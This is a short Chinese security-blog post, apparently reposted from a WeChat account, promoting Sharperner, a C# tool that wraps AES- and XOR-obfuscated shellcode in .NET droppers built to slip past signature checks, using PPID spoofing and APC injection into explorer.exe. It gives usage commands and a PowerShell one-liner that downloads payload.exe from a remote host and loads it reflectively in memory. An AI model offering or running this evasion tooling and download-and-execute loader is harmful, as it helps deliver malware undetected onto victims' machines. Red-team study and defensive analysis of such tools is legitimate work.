Sharperner - Shellcode生成器

  • A+
所属分类:安全文章

        

        Sharperner是一个用 CSharp 编写的工具,它使用 AES 和 XOR 混淆的 shellcode 生成 .NET dropper生成的可执行文件可能可以绕过签名检查


PE

  • PPID欺骗

  • 随机生成的 AES 密钥和 iv

  • 最终的 Shellcode、Key 和 IV 


.NET 

  • AES + XOR 加密的 shellcode

  • APC 进程注入 (explorer.exe)

  • 随机函数名

  • 随机生成的 AES 密钥和 iv

  • 最终的 Shellcode、Key 和 IV 


使用方法


/file       B64,hex,raw shellcode/type       cs,cpp/out        Output file Location (Optional)
Example:Sharperner.exe /file:file.txt /type:cppSharperner.exe /file:file.txt /out:payload.exe


生成的 .NET 可执行文件可以使用 powershell 反射加载


$data  = ( New-Object System.Net.WebClient).DownloadData( ' http://10.10.10.10/payload.exe ' ) $assem  = [ System.Reflection.Assembly ]::Load( $data ) [ TotallyNotMal.程序]::Main()



项目地址


https://github.com/aniqfakhrul/Sharperner/releases/tag/0.1


Sharperner - Shellcode生成器





本文始发于微信公众号(Khan安全攻防实验室):Sharperner - Shellcode生成器

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: